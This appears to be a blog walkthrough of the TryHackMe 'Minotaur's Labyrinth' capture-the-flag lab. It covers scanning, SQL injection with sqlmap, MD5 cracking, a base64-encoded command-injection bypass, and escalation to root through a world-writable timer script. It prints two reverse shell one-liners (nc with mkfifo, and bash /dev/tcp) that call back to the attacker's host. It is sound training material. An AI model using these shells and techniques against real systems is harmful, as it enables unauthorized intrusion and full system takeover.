Cybersecurity, Hacking, Pentesting, Vulnerabilities

TryHackMe — Minotaur’s Labyrinth Walkthrough

A walkthrough with my tactics, techniques, and procedures.

Reconnaissance/Scanning:

I started off by scanning the network to see which ports were open/services running on the ports.

$ nmap -A -O -sC -sV -p- <machine_IP>

Nmap scan results

Running gobuster to scan for directories.

Gobuster scan results

Gobuster scan results

In the FTP server there’s a directory to look into.

Directory on FTP server

In that directory was a hidden directory and a text file. The text file didn’t show anything important.

Contents in pub directory

In the hidden directory was the first flag and another text file.

Contents in .secret directory

Proof of first flag

This is what the text file keep_in_mind said:

Contents of keep_in_mind file

Vulnerability assessment:

The /logs directory had a log file that showed some user credentials in plaintext!

File contents in /log directory on web server

Once logged in on the main webpage, there’s a search bar that looks like it is showing potential tables or columns from a database.

I fired up burpsuite to capture a request after sending a parameter in the searchbar and used that in sqlmap.

$ sqlmap -r /path/to/request/file - batch –dump

Looks like we got some usernames and hashes!

DB table “people”

DB table “creatures”

Crackstation[.]net cracked them easily since they’re just an md5 hash!

Cracked hashes

Upon logging into the webpage, the top nav bar showed the second flag.

Proof of second flag

When viewing the source code, I saw this comment.

Comment in source code

And up at the top, the “Secret_Stuff” link leads to /echo.php

Source code showing destination

Exploit:

Visiting that page:

echo.php webpage

Thanks to the hint from TryHackMe, it let me know which characters are filtered.

Filtered expressions

Luckily, it looks like the pipe character isn’t filtered, so I tested the command whoami piped to bash because just entering a command will get echoed.

Echoed command

Since so many characters are filtered, I can’t use a regular command to try to get a reverse shell.

That means I’ll have to encode it and try that way. Base64 is great for encoding.

The reverse shell one liner I used was:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_IP>  <PORT> >/tmp/f

I encoded that and removed the equal sign at the end since it was one of the filtered characters.

<encoded_text> | base64 -d | bash 

After sending that, I got a reverse shell!

Proof of reverse shell

Checking for hidden files.

Interesting file

That looks like a good file to inspect!

Contents of dbConnect.php file

Looks like the root credentials for the DB.

Now to see the other users in the /home directory.

Other users on machine

In this user’s home directory was the user flag.

Proof of user flag

Privilege Escalation:

Looking for a way to escalate privileges, I didn’t have any luck looking at the cronjobs, no password so I couldn’t run `sudo -l`, and no SUID binaries I could exploit.

I started checking for hidden files or anything useful in the root directory.

File that’s executable by all users

That’s interesting, a directory called timers that’s writable by all users.

In one of the files on the FTP server there was mention of keeping things on a timer..

Contents of file timers

In that directory was a script that starts another bash shell.

Well, since I can write to that file I appended a reverse shell one liner to the end of it.

$ echo “bash -i >& /dev/tcp/IP_ADDRESS/8080 0>&1” >> timer.sh

Shortly after that I got a reverse shell as root.

Proof of root shell

Time to grab the root flag in the root directory.

Proof of root flag

Reporting:

• Disable anonymous login on FTP servers.
• Check data sanitization/filtered expressions on webpages.
• Ensure correct permissions are assigned on all files, especially executable files.
• Don’t store credentials in plaintext.
• Use a stronger hashing algorithm in databases to protect information.